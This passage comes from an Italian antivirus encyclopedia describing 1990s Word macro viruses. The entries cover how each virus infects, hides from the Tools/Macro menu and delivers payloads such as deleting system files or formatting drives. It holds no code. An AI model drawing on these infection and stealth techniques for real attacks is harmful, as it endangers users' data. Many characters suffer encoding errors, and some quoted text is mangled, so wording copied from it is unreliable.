[Word_NPad.BI] Nome del virus: Word.NPad.BI Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BI ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BI esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.H] Nome del virus: Word.NPad.H Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.H ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.H esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.H non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.J] Nome del virus: Word.NPad.J Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.J ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.J esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.J non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.K] Nome del virus: Word.NPad.K Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.K ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.K esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.K non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.L] Nome del virus: Word.NPad.L Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.L ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.L esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.L non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.O] Nome del virus: Word.NPad.O Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.O ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.O esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.O non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.P] Nome del virus: Word.NPad.P Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.P ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.P esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.P non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.Q] Nome del virus: Word.NPad.Q Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.Q ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.Q esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.Q non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.R] Nome del virus: Word.NPad.R Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.R ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.R esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.R non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.S] Nome del virus: Word.NPad.S Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti NPad virus Φ che NPad.S ha minori variazioni del codice. NPad.S modifica la sezione "compatibility" all'interno del file WIN.INI. Aggiunge un contatore chiamato "NPAD328" Ed ogni volta che il virua viene attivato, aggiunge 1 al proprio valore. Arrivato a 23 azzera il contatore e mostra il seguente messaggio sulla barra di stato: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_NPad.T] Nome del virus: Word.NPad.T Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.T ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.T esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.T non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.U] Nome del virus: Word.NPad.U Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti NPad virus Φ che NPad.U ha minori variazioni del codice. NPad.U modifica la sezione "compatibility" all'interno del file WIN.INI. Aggiunge un contatore chiamato "NPAD328" Ed ogni volta che il virus viene attivato, aggiunge 1 al proprio valore. Arrivato a 23 azzera il contatore e mostra il seguente messaggio sulla barra di stato: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_NPad.V] Nome del virus: Word.NPad.V Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.V ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.V esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.V non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.W] Nome del virus: Word.NPad.W Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.W ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.W esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.W non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.X] Nome del virus: Word.NPad.X Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.X ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.X esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.X non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.Y] Nome del virus: Word.NPad.Y Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.Y ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.Y esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.Y non mostra mai il messaggio originale del virus NPad.A. [Word_NPad.Z] Nome del virus: Word.NPad.Z Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.Z ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.Z esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.Z non mostra mai il messaggio originale del virus NPad.A. [Word_Nuclear.A(a.k.a. Alert)] Nome del virus: Word.Nuclear.A (a.k.a. Alert) Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, DropSuriv, File/Esci, FilePrint, FilePrintDefault, File/Salva con nome, InsertPayload, Payload Lunghezza della Macro: 10556 Byte Paese di origine: Australia Data di origine: Settembre 1995 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Nuclear fu il secondo virus da macro rilevato "In-the-Wild" (dopo Concept). Fu distribuito su Internet in un documento che dava informazioni sul virus Concept. Fu il primo virus da macro che us≥ macro Execute-Only (Criptate) per rendere l'analisi molto pi∙ difficile. Nuclear Φ attivato dalle macro "AutoExec" e "AutoOpen". Prima infetta il modello principale (NORMAL.DOT), controlla se c'Φ stata un'infezione precedente. Non infetta se trova la macro "AutoExec". I documenti sono infettati quando sono salvati con il comando "File/Salva con nome". Dopo che le macro del virus sono state trasferite al modello principale, Nuclear pu≥ richiamare qualche procedura distruttiva. In primo luogo cerca di bloccare il virus "Ph33r". Tra le 17:00 e le 17:59 crea un file di testo, comprendente lo scritta DOS/Windows-EXE del virus"Ph33r". Quindi usa il comando DOS "DEBUG.EXE" Per convertire il file in un file eseguibile. Crea inoltre il file batch "EXEC_PH.BAT", e lo chiama dall'ambiente DOS. L'ultima procedura di infezione Φ facoltativa, la finestra di DOS Φ chiusa immediatamente ed il virus "Ph33r" non infetta pi∙ il sistema In secondo luogo, infettando un documento, Nuclear controlla l'ora di sistema ed in caso il valore sia superiore a 55 nel campo dei secondi, aggiunge il seguente testo alla fine dei documenti stampati: " And finally I would like to say: " " STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " La terza procedura distruttiva Φ attivata il 5 Aprile, quando Nuclear cancella i file di sistema "C:\IO.SYS", "C:\MSDOS.SYS" e "C:\COMMAND.COM. Questo rende il computer inavviabile. [Word_Nuclear.B] Nome del virus: Word.Nuclear.B Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, FilePrint, FilePrintDefault, File/Salva con nome, InsertPayload, Payload Lunghezza della Macro: 3458 Byte Paese di origine: France Data di origine: Marzo 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione and the Nuclear.A Φ che Nuclear.B non attiva il virus "PH33r". Per maggiori informazioni fare riferimento alla descrizione di Nuclear.A. [Word_Outlaw.A] Nome del virus: Word.Outlaw.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: Scelti a caso Lunghezza della Macro: 21410 Byte Paese di origine: Germania Data di origine: Settembre 1996 Payload: Si Rilevato In The Wild: No Descrizione: Outlaw ha tre macro non criptate di 21410 Byte. Ogni nome di macro Φ formato da 5 caratteri fatti da 2 lettere (A-X) Corrispondenti al campo delle ore , nell'ora di sistema, e da 4 numeri scelti a caso. Outlaw ridefinisce i comandi delle macro. Una macro Φ associata alla lettera " E " ed un'altra alla "barra spaziatrice". Dato che entrambi i tasti sono molto usati, la probabilitα di un'infezione Φ molto alta. Outlaw Φ considerato il primo virus (semi)polimorfico, dato che cambia i nomi delle Macro. Outlaw modifica la sezione "Int1" di Win.ini (Cartella di Windows). Dα alle tre macro dei nomi scelti a caso: Name=, Name1= e Name2=. Questa modifica Φ fatta per trovare un altro modello di documento principale infetto. Outlaw non infetta il modello di documento principale se i nomi delle Macro, menzionati in Win.ini (Name=xxxxxx), esistono giα. Inoltre modifica le seguenti 3 variabili del documento: VirName VirNameDoc VirNamePayload Outlaw.A non infetta un documento se il valore della variabile VirNameDoc giα esiste in un documento. Infettando un documento il 20 di Gennaio, Outlaw Lancia la sua procedura (lavora solo sotto Windows 95). Fa sentire il rumore di una risata e crea un nuovo documento con il seguente testo: " You are infected with " " Outlaw " " A virus from Nightmare Joker. " [Word_Outlaw.B] Nome del virus: Word.Outlaw.B Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: scelti a caso Lunghezza della Macro: 21434 Byte Paese di origine: Germania Data di origine: Settembre 1996 Payload: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale virus Outlaw.A Φ che Outlaw.B ha 3 macro criptate mentre le macro di Outlaw.A non sono criptate Per altre informazioni vedere la descrizione di Outlaw.A. [Word_Outlaw.C (a.k.a MoonRaider)] Nome del virus: Word.Outlaw.C (a.k.a MoonRaider) Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: scelti a caso Lunghezza della Macro: 14806 Byte Paese di origine: Germania Data di origine: Novembre 1996 Payload: Si Rilevato In The Wild: No Descrizione: Outlaw.C Φ una risulta dalla combinazione tra i virus Outlaw.A e Magnum. Assegna dei tasti per avviare le proprie macro. Una delle macro alla pressione del tasto SPACE, la altre premendo la "e." Strumenti/Macro ed ExtrasMakro sono due macro usate dal virus. Outlaw.C sostituisce "Tools/Macro" ed "Extras/Makro" con il proprio codice in modo da rendere l'individuazione di un file infetto Pi∙ difficile (chiamata tecnica macro stealth). I rimanenti 3 nomi delle macro sono scelti casualmente. Ogni nome Φ formato da due caratteri: le prime due lettere 2 corrispondono al campo delle ore , dell'ora di infezione, ed i successivi 4 numeri sono scelti a caso. Outlaw.C annota i nomi delle proprie delle Macro nelle variabili del documento: VirName, VirNameDoc, e VirNamePayLoad. Per il modello di documento principale usa la sezione di [intl] win.ini per annotare i nomi delle proprie Macro: Name1=, Name2=, and Name3=. Premendo il tasto della "E" il 10 Ottobre di un anno qualsiasi viene creato un documento con il seguente testo: " You are infected with the MooNRaiDer Virus! " " Greetings to all members of Vlad! " " I hope that's not the end! " " The scene would be to boring without this very good group! " " Nightmare Joker " Un altro giorno dell'anno, Outlaw.C controlla che "Goodbye" sia regolato nella sezione "Vlad" di win.ini. Se non lo fosse, Φ inserito il virus basato sul DOS (scritto dal gruppo italiano VLAD), e viene aggiunta una linea a C:\AUTOEXEC.BAT per eseguire il virus. Il nome nascosto del file del virus Φ "goodbye.com." [Word_Oval.A] Nome del virus: Word.Oval.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 339 Byte Paese di origine: Texas, USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: Si Descrizione: Oval.A infetta il modello di documento principale (normal.dot) quando Φ aperto un documento infetto. Altri documenti si infettano quando sono aperti (AutoOpen). Quando Oval si attiva, cambia la misura dei caratteri del documento attivo (10% di probabilitα) , inoltre mostra il seguente messaggio sulla barra di stato: " Be sure to drink your Ovaltine " [Word_Paper.A] Nome del virus: Word.Paper.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: No Nomi delle Macro: mswFS, FileClose, AutoOpen, Strumenti/Macro, AutoExec, FieSave, mswFC, mswAO Lunghezza della Macro: 3608 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Descrizione: Quando Paper infetta un documento, o il modello di documento principale, copia tutte le proprie macro e le rinomina. Se esistono giα le macro "AutoOpen" e "FileClose" nel modello di documento principale, vengono cancellate. In questo modo, la macro "File/Salva" Φ cancellata dai documenti. Paper sostituisce le opzioni di Tools/Macro con una macro vuota per rendere l'individuazione di un file infetto pi∙ difficile (chiamata tecnica macro stealth). Se l'utente seleziona le opzioni in Tools/Macro non succede niente. [Word_PayCheck.A] Nome del virus: Word.PayCheck.A Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, File/Apri, File/Salva File/Salva con nome, ShellOpen, Strumenti/Macro Lunghezza della Macro: 8489 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: Si Descrizione: Paycheck infetta il modello di documento principale (normal.dot) quando Φ aperto un documento infetto. Altri documenti si infettano quando sono salvati. Usa "Strumenti/Macro" per rendere l'individuazione di un file infetto pi∙ difficile (chiamata tecnica macro stealth) Inoltre controlla l'ora di sistema, ed in caso di valori 25, 26, 27, 28, 29, 30 o 31 nel campo dei giorni, mostra il seguente messaggio: " Sekarang adalah tanghal 25, sudahkah anda mengabil gaji? " " He..he..selamat. Kalau bisa, lebih keras lagi kerjany a. " " Bravo BRegno Unitoit Asam!!! " Quando un utente salva un documento tra il 20 e il 31 del mese, Paycheck mostra un altro messaggio: " Internal error was occurred in module UNIDRV.DLL. " " Your application may not be work normally. " " Please contact Microsoft Product Support. " [WordPhantom.A (a.k.a Teaside, Guess, HiSexy)] Nome del virus: Word.Phantom.A (a.k.a Teaside, Guess, HiSexy) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 1126 Byte Paese di origine: Germania Data di origine: Maggio 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Quando viene aperto un documento infetto, Guess controlla che le variabili del documento siano impostate su "populated." Se "NO",un nuovo modello principale (NORMAL.DOT) Φ creato e la macro del virus "AutoOpen" Φ copiata nel nuovo documento. Fatto questo, le variabili sono regolate su "populated" per marcare un file come infetto. Se la variabile Φ giα regolata, il virus infetta il nuovo documento trasferendo la macro "AutoOpen" usando il comando MakroCopy. Guess Φ il primo virus da macro d usare le variabili di un documento come meccanismo di controllo per altri documenti infetti. A causa di un errore nel codice del programma, il virus non si replica correttamente. Su un numero scelto casualmente (tra 0 e 100), Guess attiva diverse procedure distruttive. Cambia la misure dei caratteri in uso o crea un nuovo documento (NORMAL.DOT) con il seguente testo: " The word is out. " " The word is spreading... " " The Phantom speaks... " " Sedbergh " " is CRAP " " The word spreads... " Il testo sarα stampato. Il seguente testo Φ inserito nel documento a seconda del numero scelto: " This school is really good. NOT " " We all love Mr. Hirst. " " M.R.Beard " " This network is REALLY fast. " " Hi Sexy! " " Who's been typing on my computer? " " Well helloooo there! " " Guess who? " [Word_Phardera.A (a.k.a. Phandera)] Nome del virus: Word.Phardera.A (a.k.a. Phandera) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: File/Apri Lunghezza della Macro: 1673 Byte Paese di origine: Batavia, Indonesia Data di origine: Luglio 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Phardera si attiva quando viene aperto un documento infetto (File/Apri). Phardera non infetta il modello di documento principale o i documenti se Φ presente una delle seguenti macro: "File/Apri" "ToolsCustomizeMenus" "ToolsOptionsSave" "ToolsOptionsGeneral" Phardera cerca di coprire la sua presenza eliminando Tools/Macro, Tools/Customize e File/Templates dal men∙ delle opzioni (chiamata tecnica macro stealth). Questa parte del virus lavora solo con la versione inglese di Microsoft Word. Infettndo un documento ogni 13 del mese, Phardera mostra il seguente messaggio: " Dianita DSR. [I Love Her!] " Un secondo messaggio Φ mostrato quando un documento Φ infettato ogni 31 del mese. " Phardera was here! " [Word_Polite.A(a.k.a. WW2Demo)] Nome del virus: Word.Polite.A (a.k.a. WW2Demo) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: FileClose, File/Salva con nome Lunghezza della Macro: 1918 Byte Paese di origine: USA Data di origine: Marzo 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Polite fu il primo virus creato per la versione 2.0 di Microsoft MS Word. Lavora ancora con versioni successive perchΘ le nuove release di Word sono compatibili con le vecchie. Polite pu≥ essere chiamato un virus dimostrativo ed Φ difficile che si diffonda. Prima di infettare, mostra una finestra con la seguente domanda: " Shall I infect the file ? " Se l'utente risponde usando il tasto "No", nessun documento sarα infettato. Mentre chiede il permesso per infettare un file, non chiede se pu≥ infettare il modello di documento principale (NORMAL.DOT). Infettando il modello principale o quando viene chiuso un documento infetto, Polite mostra il seguente messaggio: " I am alive! " Una volta che Polite abbia infettato un documento di Word 6.0/7.0 non pu≥ pi∙ infettare nessun documenti di Word 2.0. [Word_Random.A (Intended)] Tipo di Virus: Virus da macro di Word Nome del virus: Word.Random.A (Intended) Numero di Macro: 1 or more Criptato: No Nomi delle Macro: scelti a caso Lunghezza della Macro: 553 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: No Rilevato In The Wild: No Descrizione: Random.A Φ un altro virus da macro che non infetta nessun altro documento. E' poco probabile che gli utenti trovino questo virus. [Word_Randomic.A] Nome del virus: Word.Randomic.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: polimorfico Lunghezza della Macro: 2397 Byte Paese di origine: Germania Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: No Descrizione: Randomic infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando l'utente preme un tasto qualsiasi (che Φ collegato con la macro virale). Le due variabili del documento che contengono il nome delle macro e i tasti collegati, sono: " RANDOMIC " " TKEY " Randomic il 4 Aprile mostra un messaggio e cerca di uscire da Windows. [Word_Rapi.A] Nome del virus: Word.Rapi.A Tipo di Virus: Virus da macro di Word Numero di Macro: 7 o 11 (modello di documento principale) Criptato: No Nomi delle Macro: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen Lunghezza della Macro: 6172 Byte o 11228 Byte Paese di origine: Indonesia Data di origine: Dicembre 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Rapi infetta il modello di documento principale quando Φ aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando vengono aperti (File/Apri) o salvati (File/Salva e File/Salva con nome). Infettando, Rapi mostra il seguente messaggio: " Thank's for joining us ! " La macro "AutoExec" contiene una procedura distruttiva per cancellare i file, ma a causa di alcuni REM non Φ mai attivata. Tuttavia, Rapi.A aggiunge un file (C:\BACALAH.TXT) alla principale directory. Il file il seguente testo in indonesiano: (tradotto in inglese) " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message " " was originally called PESAN.TXT. It appears in the root directory " " after running Word 6.0 and global template (normal.dot) is " " already infected by this macro. This macro virus (before the change " " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already " " infected by this virus. When the file is opened (Open doc), the " " macro automatically executes the instructions i.e. " " copies itself to global template (normal.dot). On a certain " " date and time the macro will delete all files in the directory " " levels 1, 2, and 3 (except for hidden directories........ " " Malang (date and time of infection) @Rapi.Kom " Rapi usa "Strumenti/Macro"e "ToolsCustomize" per rendere la ricognizione di un file infetto pi∙ difficile (chiamata tecnica macro stealth). Se un utente seleziona una delle due opzioni, Word mostra un messaggio d'errore di WordBasic. Rapi.A si trasferisce in Rapi.A1 e Rapi.A2, che contengono 6 o 3 Macro (5607 Byte o 3626 Byte). [Word_Rapi.AA2] Nome del virus: Word.Rapi.AA2 Tipo di Virus: Virus da macro di Word Numero di Macro: 3 o 5 (modello di documento principale) Criptato: No Nomi delle Macro: RpAe, RpFS, AutoOpen Lunghezza della Macro: 4626 Byte or 8571 Byte (modello di documento principale) Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: Si Descrizione: Rapi.AA2 infetta il modello di documento principale quando documenti infetti sono aperti (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva). Rapi.AA fu scoperto nella sua ultima edizione, cos∞ fu chiamato Rapi.AA2. La principale differenza tra questo virus ed i precedenti Rapi Φ che la macro "RpAe" Φ corrotta. Microsoft Word non si cura delle macro corrotte Macro, tuttavia Rapi.AA2 Φ ancora in grado di infettare altri documenti. [Word_Reflex.A (a.k.a RedDwarf)] Nome del virus: Word.Reflex.A (a.k.a RedDwarf) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 o 4 Criptato: Si Nomi delle Macro: AutoOpen, FClose, FileClose, FA Lunghezza della Macro: 897 Byte nei file con estensione *.doc 1226 Byte in modello di documento principale Paese di origine: Irlanda Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Un modello di documento principale infetto contiene una o pi∙ macro ("FA"). Infettando, Reflex spegne i suggerimenti di Word per essere sicuro di nascondere l'infezione del modello di documento principale (normal.dot). I documenti infetti sono salvati con la password "Guardian." Reflex fu scritto in occasione di una conferenza sugli antivirus dopo che la Anti-Virus company lancio la sfida agli hackers di riuscire a sconfiggere la loro nuova tecnologia. Ad ogni autore di un nuovo virus da macro non identificabile con il loro prodotto, fu promesso champagne come ricompensa. Quando Reflex infetta un file mostra il seguente messaggio: " Now, Where's that Jerbil of Bubbly? " [Word_Sam.A:Tw] Nome del virus: Word.Sam.A:Tw Tipo di Virus: Virus da macro di Word Numero di Macro: 7 o 4 Criptato: Si Nomi delle Macro: AutoOpen, Autoexec, AutoNew, File/Salva con nome (Strumenti/Macro, FileTemplates, Monday) Lunghezza della Macro: 4192 o 6082 Byte Paese di origine: Taiwan Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Sam.A Φ un altro virus di macro che lavora con la versione dell'Est asiatico di Microsoft Word. Sam infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti, creati, o salvati (File/Salva con nome). Sam procedure distruttive: 1. Ogni luned∞ alle 10:00, Sam sovrascrive il file AUTOEXEC.BAT con dei comandi che formattano l'hard disk al successivo riavvio. Mostra anche i seguenti messaggi: " Taiwan Dark Monday Today is Monday, do you work hard? " " It's tea time now! Let's go out and have some fun... " 2. Ogni luned∞ 13, Sam cancella tutti i file con estensione *.INI nella cartella C:\WINDOWS e mostra il seguente messaggio: " It Is Dark Monday... " 3. Quando si accede a FileTemplates, Sam mostra il messaggio: " Taiwan Dark Monday Go ahead! Make my day!!! " e sostituisce tutto il testo con: " TAIWAN DARK MONDAY " 4. Quando si accede a Strumenti/Macro, Sam mostra il messaggio " Taiwan Dark Monday You may insert password to access here..." e cripta il documento attivo con la seguente password: " Samuel " Il documento che fu diffuso su Internet si differenzia in una macro (ToolsMacro invece di Strumenti/Macro). A causa del cambiamento di questa macro, Sam.A diventa Sam.A1 (con solo 4 macro invece di 7). I tipi con solo 4 macro non sono in grado di infettare altri documenti. Sono classificati come virus. [Word_Satanic.A] Nome del virus: Word.Satanic.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew Lunghezza della Macro: 53249 Byte Paese di origine: Germania Data di origine: Estate 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Satanic si attiva quando viene aperto un documento infetto (AutoOpen). Satanic non infetta quando Φ giα presente la macro "AutoExit" nel modello di documento principale o in un documento. Altri documenti divengono infetti quando vengono creati (AutoNew), chiusi (AutoClose) o quando si esce da Microsoft Word (AutoExit). Satanic cancella i menu di Tool/Customize, Tool/Macro e Tools/Option per rendere l'identificazione del documento pi∙ difficile (chiamata tecnica macro stealth). Satanic inserisce "Installed=Yes" nella sezione "Control" di win.ini. Se non trova i dati per entrare (prima attivazione o cancellazione) allora cerca di trovare e lanciare un virus basato sul DOS (NC.COM). Uscendo da Microsoft Word (AutoExit) il primo di Ottobre, Satanic formatta il drive C drive incondizionatamente, con perdita di tutte le informazioni. Una seconda procedura Φ attivata il 30 Settembre. Satanic Mostra il seguente messaggio: " You are infected with Satanic " [Word_Saver.A (a.k.a. SaverSex)] Nome del virus: Word.Saver.A (a.k.a. SaverSex) Tipo di 